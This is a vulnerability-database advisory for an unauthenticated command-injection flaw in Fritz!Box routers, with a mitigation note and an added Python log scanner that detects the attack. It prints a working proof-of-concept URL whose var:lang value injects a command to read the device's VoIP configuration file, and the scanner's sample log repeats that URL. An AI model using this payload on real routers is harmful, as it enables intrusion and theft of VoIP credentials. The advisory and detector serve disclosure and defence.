Vendor: Fritz!Box
By: 0x4148
CVSS: 7.5 HIGH
Unauthenticated remote command execution
CWE: 78
Product Name: Fritz!Box
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: h:avm:fritz!box
Metasploit:
Other Scripts:
Platforms Tested:

Fritz!Box Unauthenticated Remote Command Execution

The Fritz!Box networking/voice over IP router produced by AVM is vulnerable to unauthenticated remote command execution. An attacker can exploit this vulnerability by sending a crafted request to the router's web interface, allowing them to execute arbitrary commands on the device.

Mitigation:

AVM has released a security update that addresses this vulnerability. It is recommended to apply the latest firmware update to mitigate the risk.

Exploit-DB raw data:

App : Fritz!Box
Author : 0x4148

Fritz!Box is a networking/voice over IP router produced by AVM. It suffers from an unauthenticated remote command execution flaw.

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise
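
A defensive check for the request shape shown in the PoC above, as an added example that is not part of the original advisory or the Exploit-DB entry: it scans web access-log lines for /cgi-bin/webcm requests whose var: parameters decode to shell metacharacters. The log format (Apache-style access log from a proxy or sensor in front of the device), the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Shell metacharacters that have no place in a webcm "var:" parameter value.
SHELL_META = re.compile(r"[&;|`$<>\n]")
# Request line inside a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(name, decoded_value)] for webcm var: parameters holding shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/webcm"):
        return []
    hits = []
    # parse_qsl splits on the raw '&' separators first and only then
    # percent-decodes, so an encoded %26 stays inside its parameter value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Decode once more so a double-encoded value (%2526) is also caught;
        # this is a conservative choice, not a statement about the device.
        decoded = unquote(value)
        if name.startswith("var:") and SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return [(line_number, parameter, decoded_value)] for every flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((lineno, name, value))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26 HTTP/1.1" 200 9321',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html?q=a%26b HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {name} decodes to {value!r}")
```

A hit on an Internet-facing address is worth correlating with the device's firmware version, since the update referenced under Mitigation is the actual fix.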